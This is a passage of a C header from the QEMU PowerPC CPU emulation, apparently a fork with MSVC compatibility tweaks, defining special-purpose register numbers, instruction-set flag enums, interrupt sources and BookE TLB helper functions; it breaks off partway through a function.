SPR_405_DVC1 (0x3B6) #define SPR_405_DVC2 (0x3B7) #define SPR_BAMR (0x3B7) #define SPR_7XX_MMCR0 (0x3B8) #define SPR_7XX_PMC1 (0x3B9) #define SPR_40x_SGR (0x3B9) #define SPR_7XX_PMC2 (0x3BA) #define SPR_40x_DCWR (0x3BA) #define SPR_7XX_SIAR (0x3BB) #define SPR_405_SLER (0x3BB) #define SPR_7XX_MMCR1 (0x3BC) #define SPR_405_SU0R (0x3BC) #define SPR_401_SKR (0x3BC) #define SPR_7XX_PMC3 (0x3BD) #define SPR_405_DBCR1 (0x3BD) #define SPR_7XX_PMC4 (0x3BE) #define SPR_SDA (0x3BF) #define SPR_403_VTBL (0x3CC) #define SPR_403_VTBU (0x3CD) #define SPR_DMISS (0x3D0) #define SPR_DCMP (0x3D1) #define SPR_HASH1 (0x3D2) #define SPR_HASH2 (0x3D3) #define SPR_BOOKE_ICDBDR (0x3D3) #define SPR_TLBMISS (0x3D4) #define SPR_IMISS (0x3D4) #define SPR_40x_ESR (0x3D4) #define SPR_PTEHI (0x3D5) #define SPR_ICMP (0x3D5) #define SPR_40x_DEAR (0x3D5) #define SPR_PTELO (0x3D6) #define SPR_RPA (0x3D6) #define SPR_40x_EVPR (0x3D6) #define SPR_L3PM (0x3D7) #define SPR_403_CDBCR (0x3D7) #define SPR_L3ITCR0 (0x3D8) #define SPR_TCR (0x3D8) #define SPR_40x_TSR (0x3D8) #define SPR_IBR (0x3DA) #define SPR_40x_TCR (0x3DA) #define SPR_ESASRR (0x3DB) #define SPR_40x_PIT (0x3DB) #define SPR_403_TBL (0x3DC) #define SPR_403_TBU (0x3DD) #define SPR_SEBR (0x3DE) #define SPR_40x_SRR2 (0x3DE) #define SPR_SER (0x3DF) #define SPR_40x_SRR3 (0x3DF) #define SPR_L3OHCR (0x3E8) #define SPR_L3ITCR1 (0x3E9) #define SPR_L3ITCR2 (0x3EA) #define SPR_L3ITCR3 (0x3EB) #define SPR_HID0 (0x3F0) #define SPR_40x_DBSR (0x3F0) #define SPR_HID1 (0x3F1) #define SPR_IABR (0x3F2) #define SPR_40x_DBCR0 (0x3F2) #define SPR_601_HID2 (0x3F2) #define SPR_Exxx_L1CSR0 (0x3F2) #define SPR_ICTRL (0x3F3) #define SPR_HID2 (0x3F3) #define SPR_750CL_HID4 (0x3F3) #define SPR_Exxx_L1CSR1 (0x3F3) #define SPR_440_DBDR (0x3F3) #define SPR_LDSTDB (0x3F4) #define SPR_750_TDCL (0x3F4) #define SPR_40x_IAC1 (0x3F4) #define SPR_MMUCSR0 (0x3F4) #define SPR_970_HID4 (0x3F4) #define SPR_DABR (0x3F5) #define DABR_MASK (~(target_ulong)0x7) #define SPR_Exxx_BUCSR (0x3F5) #define SPR_40x_IAC2 (0x3F5) #define SPR_601_HID5 (0x3F5) #define SPR_40x_DAC1 (0x3F6) #define SPR_MSSCR0 (0x3F6) #define SPR_970_HID5 (0x3F6) #define SPR_MSSSR0 (0x3F7) #define SPR_MSSCR1 (0x3F7) #define SPR_DABRX (0x3F7) #define SPR_40x_DAC2 (0x3F7) #define SPR_MMUCFG (0x3F7) #define SPR_LDSTCR (0x3F8) #define SPR_L2PMCR (0x3F8) #define SPR_750FX_HID2 (0x3F8) #define SPR_Exxx_L1FINV0 (0x3F8) #define SPR_L2CR (0x3F9) #define SPR_L3CR (0x3FA) #define SPR_750_TDCH (0x3FA) #define SPR_IABR2 (0x3FA) #define SPR_40x_DCCR (0x3FA) #define SPR_ICTC (0x3FB) #define SPR_40x_ICCR (0x3FB) #define SPR_THRM1 (0x3FC) #define SPR_403_PBL1 (0x3FC) #define SPR_SP (0x3FD) #define SPR_THRM2 (0x3FD) #define SPR_403_PBU1 (0x3FD) #define SPR_604_HID13 (0x3FD) #define SPR_LT (0x3FE) #define SPR_THRM3 (0x3FE) #define SPR_RCPU_FPECR (0x3FE) #define SPR_403_PBL2 (0x3FE) #define SPR_PIR (0x3FF) #define SPR_403_PBU2 (0x3FF) #define SPR_601_HID15 (0x3FF) #define SPR_604_HID15 (0x3FF) #define SPR_E500_SVR (0x3FF) /* Disable MAS Interrupt Updates for Hypervisor */ #define EPCR_DMIUH (1 << 22) /* Disable Guest TLB Management Instructions */ #define EPCR_DGTMI (1 << 23) /* Guest Interrupt Computation Mode */ #define EPCR_GICM (1 << 24) /* Interrupt Computation Mode */ #define EPCR_ICM (1 << 25) /* Disable Embedded Hypervisor Debug */ #define EPCR_DUVD (1 << 26) /* Instruction Storage Interrupt Directed to Guest State */ #define EPCR_ISIGS (1 << 27) /* Data Storage Interrupt Directed to Guest State */ #define EPCR_DSIGS (1 << 28) /* Instruction TLB Error 
Interrupt Directed to Guest State */
#define EPCR_ITLBGS               (1 << 29)
/* Data TLB Error Interrupt Directed to Guest State */
#define EPCR_DTLBGS               (1 << 30)
/* External Input Interrupt Directed to Guest State */
#define EPCR_EXTGS                (1 << 31)

#define L1CSR0_CPE              0x00010000  /* Data Cache Parity Enable */
#define L1CSR0_CUL              0x00000400  /* (D-)Cache Unable to Lock */
#define L1CSR0_DCLFR            0x00000100  /* D-Cache Lock Flash Reset */
#define L1CSR0_DCFI             0x00000002  /* Data Cache Flash Invalidate */
#define L1CSR0_DCE              0x00000001  /* Data Cache Enable */

#define L1CSR1_CPE              0x00010000  /* Instruction Cache Parity Enable */
#define L1CSR1_ICUL             0x00000400  /* I-Cache Unable to Lock */
#define L1CSR1_ICLFR            0x00000100  /* I-Cache Lock Flash Reset */
#define L1CSR1_ICFI             0x00000002  /* Instruction Cache Flash Invalidate */
#define L1CSR1_ICE              0x00000001  /* Instruction Cache Enable */

/* HID0 bits */
#define HID0_DEEPNAP            (1 << 24)   /* pre-2.06 */
#define HID0_DOZE               (1 << 23)   /* pre-2.06 */
#define HID0_NAP                (1 << 22)   /* pre-2.06 */
#define HID0_HILE               PPC_BIT(19) /* POWER8 */
#define HID0_POWER9_HILE        PPC_BIT(4)
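/*
 * HID0_HILE and several of the masks below are built with PPC_BIT(),
 * which uses IBM's big-endian bit numbering: bit 0 is the *most*
 * significant bit of the 64-bit value. A sketch of the equivalent
 * shift (illustrative only; the real PPC_BIT macro is defined
 * elsewhere in this tree):
 */
#if 0 /* illustrative sketch, not compiled */
#define EXAMPLE_PPC_BIT(bit) (0x8000000000000000ULL >> (bit))
/* EXAMPLE_PPC_BIT(19) == 0x0000100000000000ULL, matching HID0_HILE        */
/* EXAMPLE_PPC_BIT(4)  == 0x0800000000000000ULL, matching HID0_POWER9_HILE */
#endif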
/*****************************************************************************/
/* PowerPC instruction types definitions                                     */
enum {
    PPC_NONE           = 0x0000000000000000ULL,

    /* PowerPC base instructions set */
    PPC_INSNS_BASE     = 0x0000000000000001ULL,
    /* integer operations instructions */
#define PPC_INTEGER PPC_INSNS_BASE
    /* flow control instructions */
#define PPC_FLOW    PPC_INSNS_BASE
    /* virtual memory instructions */
#define PPC_MEM     PPC_INSNS_BASE
    /* ld/st with reservation instructions */
#define PPC_RES     PPC_INSNS_BASE
    /* spr/msr access instructions */
#define PPC_MISC    PPC_INSNS_BASE

    /* Deprecated instruction sets */
    /* Original POWER instruction set */
    PPC_POWER          = 0x0000000000000002ULL,
    /* POWER2 instruction set extension */
    PPC_POWER2         = 0x0000000000000004ULL,
    /* Power RTC support */
    PPC_POWER_RTC      = 0x0000000000000008ULL,
    /* Power-to-PowerPC bridge (601) */
    PPC_POWER_BR       = 0x0000000000000010ULL,
    /* 64 bits PowerPC instruction set */
    PPC_64B            = 0x0000000000000020ULL,
    /* New 64 bits extensions (PowerPC 2.0x) */
    PPC_64BX           = 0x0000000000000040ULL,
    /* 64 bits hypervisor extensions */
    PPC_64H            = 0x0000000000000080ULL,
    /* New wait instruction (PowerPC 2.0x) */
    PPC_WAIT           = 0x0000000000000100ULL,
    /* Time base mftb instruction */
    PPC_MFTB           = 0x0000000000000200ULL,

    /* Fixed-point unit extensions */
    /* PowerPC 602 specific */
    PPC_602_SPEC       = 0x0000000000000400ULL,
    /* isel instruction */
    PPC_ISEL           = 0x0000000000000800ULL,
    /* popcntb instruction */
    PPC_POPCNTB        = 0x0000000000001000ULL,
    /* string load / store */
    PPC_STRING         = 0x0000000000002000ULL,
    /* real mode cache inhibited load / store */
    PPC_CILDST         = 0x0000000000004000ULL,

    /* Floating-point unit extensions */
    /* Optional floating point instructions */
    PPC_FLOAT          = 0x0000000000010000ULL,
    /* New floating-point extensions (PowerPC 2.0x) */
    PPC_FLOAT_EXT      = 0x0000000000020000ULL,
    PPC_FLOAT_FSQRT    = 0x0000000000040000ULL,
    PPC_FLOAT_FRES     = 0x0000000000080000ULL,
    PPC_FLOAT_FRSQRTE  = 0x0000000000100000ULL,
    PPC_FLOAT_FRSQRTES = 0x0000000000200000ULL,
    PPC_FLOAT_FSEL     = 0x0000000000400000ULL,
    PPC_FLOAT_STFIWX   = 0x0000000000800000ULL,

    /* Vector/SIMD extensions */
    /* Altivec support */
    PPC_ALTIVEC        = 0x0000000001000000ULL,
    /* PowerPC 2.03 SPE extension */
    PPC_SPE            = 0x0000000002000000ULL,
    /* PowerPC 2.03 SPE single-precision floating-point extension */
    PPC_SPE_SINGLE     = 0x0000000004000000ULL,
    /* PowerPC 2.03 SPE double-precision floating-point extension */
    PPC_SPE_DOUBLE     = 0x0000000008000000ULL,

    /* Optional memory control instructions */
    PPC_MEM_TLBIA      = 0x0000000010000000ULL,
    PPC_MEM_TLBIE      = 0x0000000020000000ULL,
    PPC_MEM_TLBSYNC    = 0x0000000040000000ULL,
    // The enum in msvc is 32bit **signed**.
    // https://godbolt.org/z/nYbvWPWET
#ifndef _MSC_VER
    /* sync instruction */
    PPC_MEM_SYNC       = 0x0000000080000000ULL,
    /* eieio instruction */
    PPC_MEM_EIEIO      = 0x0000000100000000ULL,

    /* Cache control instructions */
    PPC_CACHE          = 0x0000000200000000ULL,
    /* icbi instruction */
    PPC_CACHE_ICBI     = 0x0000000400000000ULL,
    /* dcbz instruction */
    PPC_CACHE_DCBZ     = 0x0000000800000000ULL,
    /* dcba instruction */
    PPC_CACHE_DCBA     = 0x0000002000000000ULL,
    /* Freescale cache locking instructions */
    PPC_CACHE_LOCK     = 0x0000004000000000ULL,

    /* MMU related extensions */
    /* external control instructions */
    PPC_EXTERN         = 0x0000010000000000ULL,
    /* segment register access instructions */
    PPC_SEGMENT        = 0x0000020000000000ULL,
    /* PowerPC 6xx TLB management instructions */
    PPC_6xx_TLB        = 0x0000040000000000ULL,
    /* PowerPC 74xx TLB management instructions */
    PPC_74xx_TLB       = 0x0000080000000000ULL,
    /* PowerPC 40x TLB management instructions */
    PPC_40x_TLB        = 0x0000100000000000ULL,
    /* segment register access instructions for PowerPC 64 "bridge" */
    PPC_SEGMENT_64B    = 0x0000200000000000ULL,
    /* SLB management */
    PPC_SLBI           = 0x0000400000000000ULL,

    /* Embedded PowerPC dedicated instructions */
    PPC_WRTEE          = 0x0001000000000000ULL,
    /* PowerPC 40x exception model */
    PPC_40x_EXCP       = 0x0002000000000000ULL,
    /* PowerPC 405 Mac instructions */
    PPC_405_MAC        = 0x0004000000000000ULL,
    /* PowerPC 440 specific instructions */
    PPC_440_SPEC       = 0x0008000000000000ULL,
    /* BookE (embedded) PowerPC specification */
    PPC_BOOKE          = 0x0010000000000000ULL,
    /* mfapidi instruction */
    PPC_MFAPIDI        = 0x0020000000000000ULL,
    /* tlbiva instruction */
    PPC_TLBIVA         = 0x0040000000000000ULL,
    /* tlbivax instruction */
    PPC_TLBIVAX        = 0x0080000000000000ULL,
    /* PowerPC 4xx dedicated instructions */
    PPC_4xx_COMMON     = 0x0100000000000000ULL,
    /* PowerPC 40x icbt instructions */
    PPC_40x_ICBT       = 0x0200000000000000ULL,
    /* rfmci is not implemented in all BookE PowerPC */
    PPC_RFMCI          = 0x0400000000000000ULL,
    /* rfdi instruction */
    PPC_RFDI           = 0x0800000000000000ULL,
    /* DCR accesses */
    PPC_DCR            = 0x1000000000000000ULL,
    /* DCR extended accesses */
    PPC_DCRX           = 0x2000000000000000ULL,
    /* user-mode DCR access, implemented in PowerPC 460 */
    PPC_DCRUX          = 0x4000000000000000ULL,
    /* popcntw and popcntd instructions */
    PPC_POPCNTWD       = 0x8000000000000000ULL,
#else
#define PPC_MEM_SYNC    0x0000000080000000ULL
#define PPC_MEM_EIEIO   0x0000000100000000ULL
#define PPC_CACHE       0x0000000200000000ULL
#define PPC_CACHE_ICBI  0x0000000400000000ULL
#define PPC_CACHE_DCBZ  0x0000000800000000ULL
#define PPC_CACHE_DCBA  0x0000002000000000ULL
#define PPC_CACHE_LOCK  0x0000004000000000ULL
#define PPC_EXTERN      0x0000010000000000ULL
#define PPC_SEGMENT     0x0000020000000000ULL
#define PPC_6xx_TLB     0x0000040000000000ULL
#define PPC_74xx_TLB    0x0000080000000000ULL
#define PPC_40x_TLB     0x0000100000000000ULL
#define PPC_SEGMENT_64B 0x0000200000000000ULL
#define PPC_SLBI        0x0000400000000000ULL
#define PPC_WRTEE       0x0001000000000000ULL
#define PPC_40x_EXCP    0x0002000000000000ULL
#define PPC_405_MAC     0x0004000000000000ULL
#define PPC_440_SPEC    0x0008000000000000ULL
#define PPC_BOOKE       0x0010000000000000ULL
#define PPC_MFAPIDI     0x0020000000000000ULL
#define PPC_TLBIVA      0x0040000000000000ULL
#define PPC_TLBIVAX     0x0080000000000000ULL
#define PPC_4xx_COMMON  0x0100000000000000ULL
#define PPC_40x_ICBT    0x0200000000000000ULL
#define PPC_RFMCI       0x0400000000000000ULL
#define PPC_RFDI        0x0800000000000000ULL
#define PPC_DCR         0x1000000000000000ULL
#define PPC_DCRX        0x2000000000000000ULL
#define PPC_DCRUX       0x4000000000000000ULL
#define PPC_POPCNTWD    0x8000000000000000ULL
#endif

#define PPC_TCG_INSNS  (PPC_INSNS_BASE | PPC_POWER | PPC_POWER2 \
                        | PPC_POWER_RTC | PPC_POWER_BR | PPC_64B \
                        | PPC_64BX | PPC_64H | PPC_WAIT | PPC_MFTB \
                        | PPC_602_SPEC | PPC_ISEL | PPC_POPCNTB \
                        | PPC_STRING | PPC_FLOAT | PPC_FLOAT_EXT \
                        | PPC_FLOAT_FSQRT | PPC_FLOAT_FRES \
                        | PPC_FLOAT_FRSQRTE | PPC_FLOAT_FRSQRTES \
                        | PPC_FLOAT_FSEL | PPC_FLOAT_STFIWX \
                        | PPC_ALTIVEC | PPC_SPE | PPC_SPE_SINGLE \
                        | PPC_SPE_DOUBLE | PPC_MEM_TLBIA \
                        | PPC_MEM_TLBIE | PPC_MEM_TLBSYNC \
                        | PPC_MEM_SYNC | PPC_MEM_EIEIO \
                        | PPC_CACHE | PPC_CACHE_ICBI \
                        | PPC_CACHE_DCBZ \
                        | PPC_CACHE_DCBA | PPC_CACHE_LOCK \
                        | PPC_EXTERN | PPC_SEGMENT | PPC_6xx_TLB \
                        | PPC_74xx_TLB | PPC_40x_TLB | PPC_SEGMENT_64B \
                        | PPC_SLBI | PPC_WRTEE | PPC_40x_EXCP \
                        | PPC_405_MAC | PPC_440_SPEC | PPC_BOOKE \
                        | PPC_MFAPIDI | PPC_TLBIVA | PPC_TLBIVAX \
                        | PPC_4xx_COMMON | PPC_40x_ICBT | PPC_RFMCI \
                        | PPC_RFDI | PPC_DCR | PPC_DCRX | PPC_DCRUX \
                        | PPC_POPCNTWD | PPC_CILDST)

    /* extended type values */

    /* BookE 2.06 PowerPC specification */
    PPC2_BOOKE206      = 0x0000000000000001ULL,
    /* VSX (extensions to Altivec / VMX) */
    PPC2_VSX           = 0x0000000000000002ULL,
    /* Decimal Floating Point (DFP) */
    PPC2_DFP           = 0x0000000000000004ULL,
    /* Embedded.Processor Control */
    PPC2_PRCNTL        = 0x0000000000000008ULL,
    /* Byte-reversed, indexed, double-word load and store */
    PPC2_DBRX          = 0x0000000000000010ULL,
    /* Book I 2.05 PowerPC specification */
    PPC2_ISA205        = 0x0000000000000020ULL,
    /* VSX additions in ISA 2.07 */
    PPC2_VSX207        = 0x0000000000000040ULL,
    /* ISA 2.06B bpermd */
    PPC2_PERM_ISA206   = 0x0000000000000080ULL,
    /* ISA 2.06B divide extended variants */
    PPC2_DIVE_ISA206   = 0x0000000000000100ULL,
    /* ISA 2.06B larx/stcx. instructions */
    PPC2_ATOMIC_ISA206 = 0x0000000000000200ULL,
    /* ISA 2.06B floating point integer conversion */
    PPC2_FP_CVT_ISA206 = 0x0000000000000400ULL,
    /* ISA 2.06B floating point test instructions */
    PPC2_FP_TST_ISA206 = 0x0000000000000800ULL,
    /* ISA 2.07 bctar instruction */
    PPC2_BCTAR_ISA207  = 0x0000000000001000ULL,
    /* ISA 2.07 load/store quadword */
    PPC2_LSQ_ISA207    = 0x0000000000002000ULL,
    /* ISA 2.07 Altivec */
    PPC2_ALTIVEC_207   = 0x0000000000004000ULL,
    /* PowerISA 2.07 Book3s specification */
    PPC2_ISA207S       = 0x0000000000008000ULL,
    /* Double precision floating point conversion for signed integer 64 */
    PPC2_FP_CVT_S64    = 0x0000000000010000ULL,
    /* Transactional Memory (ISA 2.07, Book II) */
    PPC2_TM            = 0x0000000000020000ULL,
    /* Server PM instructions (ISA 2.06, Book III) */
    PPC2_PM_ISA206     = 0x0000000000040000ULL,
    /* POWER ISA 3.0 */
    PPC2_ISA300        = 0x0000000000080000ULL,

#define PPC_TCG_INSNS2 (PPC2_BOOKE206 | PPC2_VSX | PPC2_PRCNTL | PPC2_DBRX | \
                        PPC2_ISA205 | PPC2_VSX207 | PPC2_PERM_ISA206 | \
                        PPC2_DIVE_ISA206 | PPC2_ATOMIC_ISA206 | \
                        PPC2_FP_CVT_ISA206 | PPC2_FP_TST_ISA206 | \
                        PPC2_BCTAR_ISA207 | PPC2_LSQ_ISA207 | \
                        PPC2_ALTIVEC_207 | PPC2_ISA207S | PPC2_DFP | \
                        PPC2_FP_CVT_S64 | PPC2_TM | PPC2_PM_ISA206 | \
                        PPC2_ISA300)
};
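/*
 * A note on the _MSC_VER split above: MSVC represents enumeration
 * constants as 32-bit signed ints, so any enumerator at or above bit 31
 * would be truncated or mis-signed. Keeping the high flags as macros
 * preserves their full 64-bit values. A self-contained sketch of the
 * failure mode (hypothetical names, illustrative only):
 */
#if 0 /* illustrative sketch, not compiled */
enum example_flags {
    EXAMPLE_HI_FLAG = 0x0000000080000000ULL, /* does not fit MSVC's int */
};
#define EXAMPLE_HI_FLAG_OK 0x0000000080000000ULL /* safe on all compilers */
#endif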
/*****************************************************************************/
/*
 * Memory access type:
 * may be needed for precise access rights control and precise exceptions.
 */
enum {
    /* 1 bit to define user level / supervisor access */
    ACCESS_USER  = 0x00,
    ACCESS_SUPER = 0x01,
    /* Type of instruction that generated the access */
    ACCESS_CODE  = 0x10, /* Code fetch access                */
    ACCESS_INT   = 0x20, /* Integer load/store access        */
    ACCESS_FLOAT = 0x30, /* floating point load/store access */
    ACCESS_RES   = 0x40, /* load/store with reservation      */
    ACCESS_EXT   = 0x50, /* external access                  */
    ACCESS_CACHE = 0x60, /* Cache manipulation               */
};

/*
 * Hardware interrupt sources:
 * all of these exceptions can be raised simultaneously
 */
/* Input pins definitions */
enum {
    /* 6xx bus input pins */
    PPC6xx_INPUT_HRESET = 0,
    PPC6xx_INPUT_SRESET = 1,
    PPC6xx_INPUT_CKSTP_IN = 2,
    PPC6xx_INPUT_MCP = 3,
    PPC6xx_INPUT_SMI = 4,
    PPC6xx_INPUT_INT = 5,
    PPC6xx_INPUT_TBEN = 6,
    PPC6xx_INPUT_WAKEUP = 7,
    PPC6xx_INPUT_NB,
};

enum {
    /* Embedded PowerPC input pins */
    PPCBookE_INPUT_HRESET = 0,
    PPCBookE_INPUT_SRESET = 1,
    PPCBookE_INPUT_CKSTP_IN = 2,
    PPCBookE_INPUT_MCP = 3,
    PPCBookE_INPUT_SMI = 4,
    PPCBookE_INPUT_INT = 5,
    PPCBookE_INPUT_CINT = 6,
    PPCBookE_INPUT_NB,
};

enum {
    /* PowerPC E500 input pins */
    PPCE500_INPUT_RESET_CORE = 0,
    PPCE500_INPUT_MCK = 1,
    PPCE500_INPUT_CINT = 3,
    PPCE500_INPUT_INT = 4,
    PPCE500_INPUT_DEBUG = 6,
    PPCE500_INPUT_NB,
};

enum {
    /* PowerPC 40x input pins */
    PPC40x_INPUT_RESET_CORE = 0,
    PPC40x_INPUT_RESET_CHIP = 1,
    PPC40x_INPUT_RESET_SYS = 2,
    PPC40x_INPUT_CINT = 3,
    PPC40x_INPUT_INT = 4,
    PPC40x_INPUT_HALT = 5,
    PPC40x_INPUT_DEBUG = 6,
    PPC40x_INPUT_NB,
};

enum {
    /* RCPU input pins */
    PPCRCPU_INPUT_PORESET = 0,
    PPCRCPU_INPUT_HRESET = 1,
    PPCRCPU_INPUT_SRESET = 2,
    PPCRCPU_INPUT_IRQ0 = 3,
    PPCRCPU_INPUT_IRQ1 = 4,
    PPCRCPU_INPUT_IRQ2 = 5,
    PPCRCPU_INPUT_IRQ3 = 6,
    PPCRCPU_INPUT_IRQ4 = 7,
    PPCRCPU_INPUT_IRQ5 = 8,
    PPCRCPU_INPUT_IRQ6 = 9,
    PPCRCPU_INPUT_IRQ7 = 10,
    PPCRCPU_INPUT_NB,
};

#if defined(TARGET_PPC64)
enum {
    /* PowerPC 970 input pins */
    PPC970_INPUT_HRESET = 0,
    PPC970_INPUT_SRESET = 1,
    PPC970_INPUT_CKSTP = 2,
    PPC970_INPUT_TBEN = 3,
    PPC970_INPUT_MCP = 4,
    PPC970_INPUT_INT = 5,
    PPC970_INPUT_THINT = 6,
    PPC970_INPUT_NB,
};

enum {
    /* POWER7 input pins */
    POWER7_INPUT_INT = 0,
    /*
     * POWER7 probably has other inputs, but we don't care about them
     * for any existing machine. We can wire these up when we need
     * them.
     */
    POWER7_INPUT_NB,
};
enum {
    /* POWER9 input pins */
    POWER9_INPUT_INT = 0,
    POWER9_INPUT_HINT = 1,
    POWER9_INPUT_NB,
};
#endif

/* Hardware exceptions definitions */
enum {
    /* External hardware exception sources */
    PPC_INTERRUPT_RESET = 0,  /* Reset exception                      */
    PPC_INTERRUPT_WAKEUP,     /* Wakeup exception                     */
    PPC_INTERRUPT_MCK,        /* Machine check exception              */
    PPC_INTERRUPT_EXT,        /* External interrupt                   */
    PPC_INTERRUPT_SMI,        /* System management interrupt          */
    PPC_INTERRUPT_CEXT,       /* Critical external interrupt          */
    PPC_INTERRUPT_DEBUG,      /* External debug exception             */
    PPC_INTERRUPT_THERM,      /* Thermal exception                    */
    /* Internal hardware exception sources */
    PPC_INTERRUPT_DECR,       /* Decrementer exception                */
    PPC_INTERRUPT_HDECR,      /* Hypervisor decrementer exception     */
    PPC_INTERRUPT_PIT,        /* Programmable interval timer interrupt */
    PPC_INTERRUPT_FIT,        /* Fixed interval timer interrupt       */
    PPC_INTERRUPT_WDT,        /* Watchdog timer interrupt             */
    PPC_INTERRUPT_CDOORBELL,  /* Critical doorbell interrupt          */
    PPC_INTERRUPT_DOORBELL,   /* Doorbell interrupt                   */
    PPC_INTERRUPT_PERFM,      /* Performance monitor interrupt        */
    PPC_INTERRUPT_HMI,        /* Hypervisor Maintenance interrupt     */
    PPC_INTERRUPT_HDOORBELL,  /* Hypervisor Doorbell interrupt        */
    PPC_INTERRUPT_HVIRT,      /* Hypervisor virtualization interrupt  */
};

/* Processor Compatibility mask (PCR) */
enum {
    PCR_COMPAT_2_05     = PPC_BIT(62),
    PCR_COMPAT_2_06     = PPC_BIT(61),
    PCR_COMPAT_2_07     = PPC_BIT(60),
    PCR_COMPAT_3_00     = PPC_BIT(59),
    PCR_COMPAT_3_10     = PPC_BIT(58),
#ifndef _MSC_VER
    PCR_VEC_DIS         = PPC_BIT(0), /* Vec. disable (bit NA since POWER8) */
    PCR_VSX_DIS         = PPC_BIT(1), /* VSX disable (bit NA since POWER8)  */
    PCR_TM_DIS          = PPC_BIT(2), /* Trans. memory disable (POWER8)     */
#else
#define PCR_VEC_DIS PPC_BIT(0)
#define PCR_VSX_DIS PPC_BIT(1)
#define PCR_TM_DIS PPC_BIT(2)
#endif
};

/* HMER/HMEER */
#ifndef _MSC_VER
enum {
    HMER_MALFUNCTION_ALERT      = PPC_BIT(0),
    HMER_PROC_RECV_DONE         = PPC_BIT(2),
    HMER_PROC_RECV_ERROR_MASKED = PPC_BIT(3),
    HMER_TFAC_ERROR             = PPC_BIT(4),
    HMER_TFMR_PARITY_ERROR      = PPC_BIT(5),
    HMER_XSCOM_FAIL             = PPC_BIT(8),
    HMER_XSCOM_DONE             = PPC_BIT(9),
    HMER_PROC_RECV_AGAIN        = PPC_BIT(11),
    HMER_WARN_RISE              = PPC_BIT(14),
    HMER_WARN_FALL              = PPC_BIT(15),
    HMER_SCOM_FIR_HMI           = PPC_BIT(16),
    HMER_TRIG_FIR_HMI           = PPC_BIT(17),
    HMER_HYP_RESOURCE_ERR       = PPC_BIT(20),
    HMER_XSCOM_STATUS_MASK      = PPC_BITMASK(21, 23),
};
#else
#define HMER_MALFUNCTION_ALERT      PPC_BIT(0)
#define HMER_PROC_RECV_DONE         PPC_BIT(2)
#define HMER_PROC_RECV_ERROR_MASKED PPC_BIT(3)
#define HMER_TFAC_ERROR             PPC_BIT(4)
#define HMER_TFMR_PARITY_ERROR      PPC_BIT(5)
#define HMER_XSCOM_FAIL             PPC_BIT(8)
#define HMER_XSCOM_DONE             PPC_BIT(9)
#define HMER_PROC_RECV_AGAIN        PPC_BIT(11)
#define HMER_WARN_RISE              PPC_BIT(14)
#define HMER_WARN_FALL              PPC_BIT(15)
#define HMER_SCOM_FIR_HMI           PPC_BIT(16)
#define HMER_TRIG_FIR_HMI           PPC_BIT(17)
#define HMER_HYP_RESOURCE_ERR       PPC_BIT(20)
#define HMER_XSCOM_STATUS_MASK      PPC_BITMASK(21, 23)
#endif

/* Alternate Interrupt Location (AIL) */
enum {
    AIL_NONE                = 0,
    AIL_RESERVED            = 1,
    AIL_0001_8000           = 2,
    AIL_C000_0000_0000_4000 = 3,
};

/*****************************************************************************/

#define is_isa300(ctx) (!!(ctx->insns_flags2 & PPC2_ISA300))
target_ulong cpu_read_xer(CPUPPCState *env);
void cpu_write_xer(CPUPPCState *env, target_ulong xer);
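/*
 * cpu_read_xer()/cpu_write_xer() (implemented elsewhere) reassemble the
 * architected XER from the split-out env->so/ov/ca fields, using the
 * XER_* bit positions defined earlier in this header. A minimal sketch
 * of the read direction, assuming those fields hold single-bit values
 * as the xer_* accessor macros above suggest:
 */
#if 0 /* illustrative sketch, not compiled */
static inline target_ulong example_read_xer(CPUPPCState *env)
{
    return env->xer | ((target_ulong)env->so << XER_SO) |
           ((target_ulong)env->ov << XER_OV) |
           ((target_ulong)env->ca << XER_CA);
}
#endif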
/*
 * All 64-bit server processors compliant with arch 2.x, i.e. 970 and newer,
 * have PPC_SEGMENT_64B.
 */
#define is_book3s_arch2x(ctx) (!!((ctx)->insns_flags & PPC_SEGMENT_64B))

static inline void cpu_get_tb_cpu_state(CPUPPCState *env, target_ulong *pc,
                                        target_ulong *cs_base, uint32_t *flags)
{
    *pc = env->nip;
    *cs_base = 0;
    *flags = env->hflags;
}

void QEMU_NORETURN raise_exception(CPUPPCState *env, uint32_t exception);
void QEMU_NORETURN raise_exception_ra(CPUPPCState *env, uint32_t exception,
                                      uintptr_t raddr);
void QEMU_NORETURN raise_exception_err(CPUPPCState *env, uint32_t exception,
                                       uint32_t error_code);
void QEMU_NORETURN raise_exception_err_ra(CPUPPCState *env, uint32_t exception,
                                          uint32_t error_code, uintptr_t raddr);

static inline int booke206_tlbm_id(CPUPPCState *env, ppcmas_tlb_t *tlbm)
{
    uintptr_t tlbml = (uintptr_t)tlbm;
    uintptr_t tlbl = (uintptr_t)env->tlb.tlbm;

    return (tlbml - tlbl) / sizeof(env->tlb.tlbm[0]);
}

static inline int booke206_tlb_size(CPUPPCState *env, int tlbn)
{
    uint32_t tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlbn];
    int r = tlbncfg & TLBnCFG_N_ENTRY;
    return r;
}

static inline int booke206_tlb_ways(CPUPPCState *env, int tlbn)
{
    uint32_t tlbncfg = env->spr[SPR_BOOKE_TLB0CFG + tlbn];
    int r = tlbncfg >> TLBnCFG_ASSOC_SHIFT;
    return r;
}

static inline int booke206_tlbm_to_tlbn(CPUPPCState *env, ppcmas_tlb_t *tlbm)
{
    int id = booke206_tlbm_id(env, tlbm);
    int end = 0;
    int i;

    for (i = 0; i < BOOKE206_MAX_TLBN; i++) {
        end += booke206_tlb_size(env, i);
        if (id < end) {
            return i;
        }
    }

    cpu_abort(env_cpu(env), "Unknown TLBe: %d\n", id);
    return 0;
}

static inline int booke206_tlbm_to_way(CPUPPCState *env, ppcmas_tlb_t *tlb)
{
    int tlbn = booke206_tlbm_to_tlbn(env, tlb);
    int tlbid = booke206_tlbm_id(env, tlb);
    return tlbid & (booke206_tlb_ways(env, tlbn) - 1);
}

static inline ppcmas_tlb_t *booke206_get_tlbm(CPUPPCState *env, const int tlbn,
                                              target_ulong ea, int way)
{
    int r;
    uint32_t ways = booke206_tlb_ways(env, tlbn);
    int ways_bits = ctz32(ways);
    int tlb_bits = ctz32(booke206_tlb_size(env, tlbn));
    int i;

    way &= ways - 1;
    ea >>= MAS2_EPN_SHIFT;
    ea &= (1 << (tlb_bits - ways_bits)) - 1;
    r = (ea << ways_bits) | way;

    if (r >= booke206_tlb_size(env, tlbn)) {
        return NULL;
    }

    /* bump up to tlbn index */
    for (i = 0; i < tlbn; i++) {
        r += booke206_tlb_size(env, i);
    }
    return &env->tlb.tlbm[r];
}

/* returns bitmap of supported page sizes for a given TLB */
static inline uint32_t booke206_tlbnps(CPUPPCState *env, const int tlbn)
{
    uint32_t ret = 0;

